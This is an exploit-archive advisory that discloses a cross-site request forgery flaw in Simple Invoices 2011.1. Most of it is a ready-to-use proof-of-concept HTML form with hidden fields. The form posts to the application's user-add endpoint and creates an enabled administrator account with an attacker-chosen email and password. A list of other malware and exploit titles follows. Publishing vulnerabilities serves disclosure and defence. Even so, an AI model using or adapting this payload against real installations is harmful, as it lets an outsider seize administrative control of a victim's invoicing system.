Simple Invoice 2011.1 Cross Site Request Forgery

Posted on 22 May 2015

# Affected software: simple invoice
# Type of vulnerability:adding admin user via csrf
# URL:simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com

#version:2011.1
# Proof of concept

<html>

 <body>
 <form action="
http://demo.simpleinvoices.org/index.php?module=user&view=add"
method="POST">
 <input type="hidden" name="email" value="aaaa@gmail.com" />
 <input type="hidden" name="role" value="1" />
 <input type="hidden" name="password_field" value="lalala123@"
/>
 <input type="hidden" name="enabled" value="1" />
 <input type="hidden" name="submit" value="Insert User" />
 <input type="hidden" name="op" value="insert_user" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Apache Solr Backup/Restore API Remote Code Execution
Nginx 1.25.5 Host Header Validation
Relate Learning And Teaching System SSTI / Remote Code Execution
Flowise 1.6.5 Authentication Bypass
WordPress Background Image Cropper 1.2 Shell Upload

Last 20